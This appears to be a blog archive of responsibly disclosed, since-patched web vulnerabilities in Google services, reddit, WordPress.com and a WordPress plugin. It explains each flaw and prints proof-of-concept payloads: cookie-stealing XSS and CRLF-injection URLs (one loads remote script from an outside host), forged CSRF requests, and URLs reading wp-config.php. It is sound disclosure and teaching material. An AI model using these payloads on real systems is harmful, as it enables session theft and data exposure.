Category: Vulnerability Writeups
2011
02.03

[Note: According to Google, I was not the first person to report this vulnerability to them. If the original reporter cares to come forward, I’ll be more than happy to cite their work in this writeup :-)]

Summary

Blogger’s Design Preview functionality served up author-generated content in the context of blogger.com, allowing an author to perform an XSS attack against a blog administrator.

How did it work?

Blogger is designed to allow authors to include arbitrary content in their blog posts. As the Google Security Team explains

Blogger users are permitted to place non-Google as well as Google JavaScript in their own blog templates and blog posts; our take on this is that blogs are user-generated content, in the same way that a third party can create their own website on the Internet. Naturally, for your safety, we do employ spam and malware detection technologies — but we believe that the flexibility in managing your own content is essential to the success of our blogging platform.

Note: when evaluating the security of blogspot.com, keep in mind that all the account management functionality – and all the associated HTTP cookies – use separate blogger.com and google.com domains.

So, for an attack on Blogger to be anything more than an annoyance, the attack has to target blogger.com or google.com as opposed to the subdomain where the blog is hosted.

In this case, there was a vulnerability in how user-generated content was presented on Blogger’s backend, which is served from blogger.com. The vulnerability involved Blogger’s Design Preview functionality, which is used by administrators to test layout changes. The preview of the blog’s content was being served from blogger.com, not from the blog’s (sub)domain. As a result, any JavaScript or other malicious content contained on the page (for instance, from a post written by an author) would be run in the context of blogger.com, exposing cookies and other sensitive information.

The JavaScript in the post creates an alert box with the value of document.location. As you can see, the JavaScript was executed on blogger.com

The JavaScript in the post creates an alert box with the value of document.location. As you can see, the JavaScript was executed on blogger.com

Same JavaScript as the example above, but executed using the Preview button on the Edit HTML page of the Design section

Same JavaScript as the example above, but executed using the Preview button on the Edit HTML page of the Design section

This vulnerability required the attacker to have author level (or higher) privileges on the same blog as the target, limiting its effectiveness. However, a malicious author could have used this vulnerability to perform privilege escalation via a CSRF attack, giving themselves administrator level privileges on the blog.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills.

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2011
02.01

Summary

Google Code contained a static HTML page that was vulnerable to a reflected, DOM-based XSS vulnerability.

How Did It Work?

The page in question is located at http://code.google.com/testing/iframe_example.html. I originally came across it when I was performing a Google search for an unrelated vulnerability: I’m not sure how I would have found it otherwise. :-P

The page itself is fairly straightforward. It uses JavaScript to parse the query string and extract key/value pairs; it then document.write to add the data provided by the user directly to the page. If you look at the HTML on the page right now, you can see that user input is sanitized using JavaScript’s escape function: in the past, that was not the case. That lack of sanitization is what allowed the vulnerability to occur.

JavaScript could be executed by entering HTML in the url field, for example.

JavaScript could be executed by entering HTML in the url field, for example.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills (and for putting up with me even when I report vulnerabilities that, unlike this one, affect only IE 6 / 7 :-P )

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2011
01.14

Summary

Reddit.com was vulnerable to an HTTP Response Splitting vulnerability. As a result, it was possible to execute arbitrary JavaScript and HTML on the reddit.com domain.

What is HTTP Response Splitting?

From Wikipedia:

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response’s headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.

The Web Application Security Consortium also has a good writeup, including sources with more details.

How Did The Vulnerability Work?

Reddit.com, like many sites on the Internet, has a redirect system built into its login functionality. If you’re viewing a page on reddit.com and choose to log in, the system will redirect you back to your original page afterward. The redirect functionality appears to be limited to pages on reddit.com and to reddit.com subdomains.

Under normal circumstances, a login URL with a redirect might look something like this:
http://reddit.com/login?dest=/r/reddit.com

If a user is already logged in, that URL will skip the login step and go straight to the redirection. The headers sent for that redirect look like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
HTTP/1.1 302 Moved Temporarily  
Content-Type: text/html; charset=UTF-8  
Location: /r/reddit.com  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Encoding: gzip  
Content-Length: 20  
Server: '; DROP TABLE servertypes; --  
Vary: Accept-Encoding  
Date: Fri, 14 Jan 2011 03:02:59 GMT  
Connection: keep-alive

Unfortunately, the vulnerability occurred because the “dest” parameter of the URL allowed an attacker to include newline characters (\r\n, or %0D%0A). Those characters were then parsed literally, which gave an attacker control over part of the HTTP response being sent by reddit’s servers.

To illustrate the point, lets take a look at one of the proof of concepts I developed to demonstrate the vulnerability.

The malicious URL we’re interested in is http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation:%20javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>. Because of the newline characters being included in the “dest” parameter, the response sent by reddit’s servers would now look something like this

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /r/reddit.com
Location: javascript:

<script>alert(document.cookie)</script>
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Content-Length: 20
Server: '; DROP TABLE servertypes; --
Vary: Accept-Encoding
Date: Fri, 14 Jan 2011 03:02:59 GMT
Connection: keep-alive

Two sets of newlines in a row (%0D%0A%0D%0A) indicate that the HTTP headers are done being sent and the remainder of the response is the response body. Normally, the body of a redirect response is not rendered by the browser: the redirect makes that impossible to do. However, I used the second Location: header to try and confuse the browser, halting the redirect and causing the browser to display the body, which now contained JavaScript that I had included.

Proof of Concepts

I developed a number of proof of concepts, since browser-specific behaviors heavily influenced whether a particular URL could trigger an XSS vulnerability in a particular browser.

  1. http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation: javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in Firefox only. Firefox halts the redirect and displays the body of the response if it encounters a second Location header containing something invalid (like a redirect to a JavaScript URI).
  2. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in both Firefox and Chrome. Both browsers would not redirect and would display the body of the response if the Location header contained a null byte.
  3. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script src=”http://ha.ckers.org/xss.js”></script>
    This proof of concept worked in Safari only. It is similar to the second proof of concept, but it contains a different JavaScript payload: for some reason, Safari would not execute the JavaScript in the second proof of concept (I didn’t investigate the exact cause too much).

And of course, no XSS writeup would be complete without a picture. So, here’s a screenshot of the first proof of concept in action:

In Firefox 3.6.x, it was possible to trigger JavaScript by injecting a second, invalid Location header and a body containing <script> tags into the response.

In Firefox 3.6.x, it was possible to trigger JavaScript by injecting a second, invalid Location header and a body containing <script> tags into the response.

In case anyone is curious, this vulnerability was patched within 48 hours of my original report.

Anything Else?

I want to thank reddit’s admins for supporting the responsible disclosure of security vulnerabilities. :-)

Also, if you have any questions about HTTP Response Splitting or other web application security vulnerabilities, feel free to leave them in the comments!

2011
01.10

Summary

Feedburner accounts were vulnerable to a CSRF attack against certain services (MyBrand and FeedBulletin). An attacker could cause a user to enable or disable these services (potentially disrupting end-user access to content, in the case of MyBrand).

How Did It Work?

This vulnerability was fairly straightforward. To activate/deactivate MyBrand/FeedBulletin, you sent a simple POST request (to http://feedburner.google.com/fb/a/mybrandSubmit for MyBrand and to http://feedburner.google.com/fb/a/feedbulletinSubmit for FeedBulletin). Neither of those requests required a CSRF token to be processed. Accordingly, an attacker could trick a user into submitting a request without their consent.

Consider a possible attack. The target, Alice, owns a blog located at AliceAppSec.org. Alice provides an RSS feed for her blog (http://feeds.aliceappsec.org/AliceAppSec) using FeedBurner’s MyBrand service. The attacker, Marvin, is a jealous competitor; he wants to disrupt Alice’s RSS feed. To do so, he crafts a page that automatically submits a malicious MyBrand-disabling POST request to FeedBurner. Once that’s done, all he needs to do is convince Alice to look at the page: if she’s signed in to FeedBurner, the POST request will disable MyBrand for her account, causing her feed to return a 404.

Since the vulnerability is now patched, the proof of concept I sent to Google no longer functions. However, I’ve made the code (a simple HTML page) available for anyone who wants to check it out.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills (and for responding to my many emails, even late at night on Sundays). :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.31

Yesterday, I ran across a very interesting XSS vulnerability involving Flash embeds and Wordpress.com. The vulnerable code is now patched (even during the holidays, Automattic’s response time was stellar), so here are all the juicy details. ;-)

In the interest of security, Wordpress.com limits what HTML elements its users are allowed to post on their blogs. Anyone who’s interested can read about those limits on the Wordpress.com site. However, to allow users to embed different types of content (i.e. videos, music, etc), Wordpress.com supports a series of “shortcodes.” These codes are typically created for trusted websites (i.e. YouTube) and allow users to embed content without using HTML directly.

It turns out that VodPod, one of the websites with a Wordpress.com shortcode, provides a way to embed third party content. It does so by generating a URL like http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345 which 301 redirects to your content hosted elsewhere. The Wordpress.com shortcode, when parsed, becomes an embed tag using the VodPod URL. Your browser will happily follow the redirect, allowing any SWF to be displayed within a Wordpress.com blog.

Now, under normal circumstances, that wouldn’t be an issue. These days, just the act of embedding a Flash applet on your page doesn’t cause security issues. However, there was a tiny issue with the HTML that Wordpress.com generated for embeds from VodPod. I’ve reproduced the bad embed code below:

1
2
3
4
5
6
7
<embed
src='http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345'
type='application/x-shockwave-flash'
AllowScriptAccess='always'
pluginspage='http://www.macromedia.com/go/getflashplayer'
wmode='transparent'
flashvars='' width='425' height='350' />

The problem? The embed tag contained AllowScriptAccess='always'. According to Adobe’s documentation, that meant the embedded SWF could execute JavaScript in the context of the page it was being displayed on. Coupled with the ability to embed arbitrary SWFs from third parties, it made an XSS attack against Wordpress.com possible.

So, I shot off an email to Automattic’s security email address with the details: I received a reply very quickly and the vulnerability was patched (by changing the value for AllowScriptAccess to sameDomain) within a few hours. A very happy ending to this holiday tale. :)

2010
12.21

Summary

One page in Google’s Help Center was vulnerable to a reflected cross-site scripting attack.

How did it work?

The page in question contained the following snippet of JavaScript embedded within its HTML:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
function fileCartReport(form) {
    var comment = form.elements['body'].value;
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"');
    var client = '0' * 1;
    cartReporter().fileCartReport(entityStr, getAbuseType(), comment, client, function () {
        form.submit();
    });
}
*/

function fileCartReport(form) {
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"')
    var report = {
        entityId: entityStr,
        abuseCategory: getAbuseType(),
        comment: form.elements['body'].value,
        applicationId: '0' * 1,
        language: 'en'
    }
    cartReporter().fileCartReport(report, function () {
        form.submit();
    });
}

In the real code, the string entity text was actually the value of a parameter named entity passed in the URL. In normal links to the page, the entity parameter was a JSON-encoded string, which the rest of the JavaScript would then submit back to Google. However, since the data was being passed in the URL, it was possible to change the value placed in the JavaScript.

Of course, the value wasn’t fully under my control: for instance, there was still some input escaping that turned single quotes and double quotes into HTML entities. As a result, I couldn’t find a way to inject arbitrary JavaScript into the uncommented function. However, I realized that it was possible to inject it into the commented function: all I needed to do was begin my payload with */ and end it with /*, to preserve the existing block comment. At that point, I could write just about any JavaScript I wanted in the middle (keeping in mind the restrictions imposed by input escaping).

The vulnerability in action

I remembered to grab a screenshot of the vulnerability as I was testing for it, and I’ve reproduced it below;

The XSS vulnerability in action (in Google Chrome)

The XSS vulnerability in action (in Google Chrome)

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.17

Summary

The new Google Groups interface contained an XSS vulnerability in its search functionality. The vulnerability required some user interaction to be activated.

How Did It Work?

The search box at the top of the new interface is designed to provide some type-ahead functionality: as the user types, his/her input is scanned and used to create a drop down menu of choices. Unfortunately, user input was not properly sanitized; for instance, typing <u> into the search box caused drop down menu items to become underlined. As a result of this oversight, it was possible to type arbitrary HTML/JavaScript into the search box and have it executed by the page.

The new interface's type-ahead functionality, hard at work

The new interface’s type-ahead functionality, hard at work

My next step was to find a way to pass a malicious search string to a user. As it turned out, the interface provided a way to link to search results: visiting https://groups.google.com/forum/?fromgroups#!searchin/googlegroups-announce/<script>alert(document.cookie)<$2Fscript> would put <script>alert(document.cookie)</script> into the user’s search box.

Executing that malicious string required a little user interaction, however. The drop down box (and accordingly, the XSS) would only be activated when the user interacted with the search field. It was possible for a user to avoid the XSS by clicking in the box, highlighting the text, and deleting the entire string (or changing a character in the string so that the script failed to run). However, any other kind of interaction would have triggered the script’s execution.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.07

Summary

Google Scholar was vulnerable to minor but potentially annoying CSRF vulnerabilities in two different pages. The regular search equivalents of both of these pages used CSRF tokens to mitigate these problems.

Vulnerability #1

There was no CSRF protection used when saving preferences in Google Scholar. So, browsing to the following URL used to set your language on Google Scholars to Arabic and set your search results to return papers written in Chinese: http://scholar.google.com/scholar_setprefs?hl=ar&lang=some&lr=lang_zh-CN&submit. As of right now, the URL no longer updates user preferences (although it does change the language for the current page, and any page accessed from links/forms off of that page).

Vulnerability #2

There was no CSRF check in place for setting up email alerts in Google Scholar. A simple POST to http://scholar.google.com/scholar_alerts?view_op=list_alerts&hl=en where the POST data was

1
2
3
alert_query=[SOME QUERY]&
alert_max_results=10&
create_alert_btn=Create+alert

would have resulted in an alert being created for the currently logged in user (there was a parameter, email_for_op, that was passed in during a real request: removing it seemed to cause the system to default to the currently logged in user’s email address).

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
11.30

Summary

Google Calendar was vulnerable to a series of CSRF vulnerabilities. In two separate instances, I found that existing countermeasures (CSRF tokens) were not being validated by the application.

Walkthroughs

Example #1

In the first instance, I found it was possible to add an arbitrary event to a user’s calendar. I used Google Calendar’s “quick add” feature: it allows users to click on a space on the calendar and type in the name of an event, which adds it to the calendar. By monitoring the HTTP traffic between my browser and Google, I determined that the calendar entry was being created by a GET request that looked something like this (I’ve broken up the URL for the sake of readability):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&pprop=HowCreated%3ADRAG
&src=kmVhbF9wb29sLUBicm93bi5lZGU
&ctz=America%2FNew_York
&eid=1288669371381
&sf=true
&action=CREATE
&output=js
&lef=LHZkMjYxNDNmODNlOTBlbnZqMTQ0amh1Ym9AZ3JvdXAuY2FsZW5kYXIuZ29vZ2xlLmNvbQ
&lef=MW4udXNhI2hvbGlkYXlAZ3JvdXVudi5jYWxlbmRhci5nb29nbGUuY29t
&lef=bsVhbF9wb21sZUBicm92bi5lZHU
&droi=20101024T000000%2F20101212T000000
&secid=-_1FyItA6aDLfYZl6GhuK62s74o

The first thing I tried doing was removing the secid parameter (which I assumed to be a CSRF token): surprisingly, while the output of the response changed slightly, it still created a new event on the calendar. I then experimented through trial and error with removing more parameters until I got the URL down to the following:

1
2
3
4
5
http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&sf=true
&action=CREATE

An attacker could have provided that URL to a target in any number of ways: just visiting it would have added a corresponding entry to the target’s calendar.

Example #2

The second instance involved changing the privacy settings of an existing calendar. To do so, an attacker first needed to determine the calendar’s unique identifier. I proposed the following method for finding such an identifier, assuming the target is a Gmail user (and we’re interested in their default, personal calendar):

  1. Identify the target. Lets say the target is example@gmail.com.
  2. Register a Gmail account where the first letter of the account is different from the target’s. So, here, I might register fxample@gmail.com
  3. Sign in to Google Calendar as the attacker, take a look at the printable image version of your calendar. It will have the attacker’s email address in the upper left hand corner. The URL for the image looks something like this (I’ve omitted unnecessary parameters): https://www.google.com/calendar/printable?src=[SOME STR]&psdec=true&pft=png
  4. Through trial and error, try different permutations of letters/numbers in the first few characters of the src parameter. You can see how your changes affect the decoded string by looking in the upper left of the image: it will display a new email address based on your changes (sometimes it might tell you that the src is invalid, in which case you just continue trying). There’s a small enough number of possibilities that it can be brute-forced.
  5. Eventually, you figure out what the right src value is for the target: the email on top will match the target’s email address.

From there, the rest was simple. Privacy settings are controlled by sending a POST request to https://www.google.com/calendar/editcaldetails. A CSRF token was included if the request was made via the web interface, but omitting the token did not prevent the request from functioning. The POST body consisted of just the following:

1
2
3
dtid=[VALID-SRC]
&ap=X19wdWJsaWNfcHJpbmNpcGFsX19dcHVibGljxmNhbGVuZGFyLmdvb2dsZS5jb20
&ap=20

where [VALID-SRC] was the valid src found in step 5 and the rest was a constant derived from the HTML for the corresponding form in the web interface.

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team.

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
08.06

Last weekend, I evaluated a couple Wordpress plugins that I wanted to add to this site. One of the plugins I loooked at was Scripts Gzip: its goal is to reduce the number of requests needed to fetch CSS/JS. As the author puts it:

It does not cache, minify, have a “PRO” support forum that costs money, keep any logs or have any fancy graphics. It only does one thing, merge+compress, and it does it relatively well.

I happened to take a look at the plugin’s code because I was curious how it was fetching the CSS/JS. However, I soon discovered a number of fairly serious security vulnerabilities. I immediately contacted the author with an explanation of what I had found. He responded quickly, acknowledged the issues, and released a new version of the plugin that addressed all of the vulnerabilities I had found.

Since a fixed version of the plugin has now been released, I feel comfortable discussing the flaws publicly. I’ll be giving a brief synopsis along with details about each vulnerability, ordered below from most to least serious.

1. Arbitrary Exposure of File Contents

This vulnerability was quite serious. It allowed an attacker to view the complete contents of any file within the Wordpress directory, even sensitive PHP files like wp-config.php.

The problem came from this function in gzip.php:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
private function collectData($options)
{
    $returnValue = array('data' => '', 'latestModified' => null);
    foreach($options['files'] as $file)
    {
        $oldDirectory = getcwd();
        $parsedURL = parse_url($file);
        $file = $parsedURL['path'];
        $file = preg_replace('/\.\./', '', $file);  // Avoid people trying to get into directories they're not allowed into.
        $parents = '../../../';                 // wp-content / plugins / scripts_gzip
        $realFile =  $parents . $file;
        if (!is_readable($realFile))
            continue;

        if ($options['mime_type'] == 'text/css')
        {
            chdir($parents);
            $base = getcwd() . '/';
            // Import all the files that need importing.
            $contents = $this->import(array(
                'contents' => '',
                'base' => $base,
                'file' => $file,
            ));
            // Now replace all relative urls with ones that are relative from this directory.
            $contents = $this->replaceURLs(array(
                'contents' => $contents,
                'base' => $base,
                'parents' => $parents,
            ));
        }
        else
        {
            $contents = file_get_contents($realFile);
        }

        $returnValue['data'] .= $contents;

        if ($options['mime_type'] == 'application/javascript')
            $returnValue['data'] .= ";\r\n";

        chdir($oldDirectory);

        $returnValue['latestModified'] = max($returnValue['latestModified'], filemtime($realFile));
    }
    return $returnValue;
}

The key to understanding this vulnerability is understanding the inputs. $options is an array containing user data, including the names of files that the user has asked the script to gzip. So, we understand that lines 6-13 are sanitization/validation checks that prevent the user from trying to load files outside of the Wordpress directory or trying to load non-existent files. However, we can also see that on line 34, the file requested by the user is loaded without any other special validation. That code path is executed when the user requests that JS be gzipped.

As a concerete example, we can say that http://example.com/wordpress/wp-content/plugins/scripts-gzip/gzip.php?js=wp-config.php would load the Wordpress configuration file on a vulnerable installation.

2. “Limited” Exposure of File Contents

A less serious security vulnerability occurs if the attacker tries loading CSS instead of JS. As we can see from the code above, if the script is loading CSS it calls an import function, which is reproduced in part below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
/**
 * Import a CSS @import.
 */
private function import($options)
{
    $dirname = dirname($options['file']);
    if (!is_readable($dirname))
        return $options['contents'];

    // SECURITY: file may not be outside our WP install.
    if (!str_startsWith(realpath($options['file']), $options['base']))
        return $options['contents'];

    // SECURITY: file may not be a php file.
    if (strpos($options['file'], '.php') !== false)
        return $options['contents'];

    // Change the directory to the new file.
    chdir($dirname);
    $newContents = file_get_contents(basename($options['file']));

    // The rest of the code has been omitted for space considerations
}

It’s clear that this code path does do some extra validation. However, we can also see that the validation is not strong enough. It employs a blacklist model (forbidding files ending in .php) rather than a whitelist model (eg: only allowing files ending in .css). Accordingly, an attacker can request potentially sensitive but not forbidden files (eg: .htaccess) that are within the Wordpress directory.

As another concerete example, we can say that http://example.com/wordpress/wp-content/plugins/scripts-gzip/gzip.php?css=.htaccess would load the .htaccess file for Wordpress, if it exists.

3. Path Disclosure

This vulnerability is the least serious of the bunch. However, a path disclosure vulnerability can be useful for hackers looking to gain more information about a target. It can also make other sorts of attacks easier to pull off. This vulnerability required an attacker to be able to write a file somewhere within the Wordpress directory (possibly if they’re allowed to upload attachments). If the file contained a line with url(‘…’) and the script were directed to parse it it as CSS, the result returned would contain the absolute path to the Wordpress directory.

Summary

All of these vulnerabilities have been resolved in the latest version of the plugin, 0.9.1. I urge anyone using Scripts Gzip to upgrade as soon as possible. I’d especially like to thank the plugin’s author, Edward Hevlund, for his speedy responses to my emails, his attentiveness to security issues, and (of course) for a wonderfully useful plugin.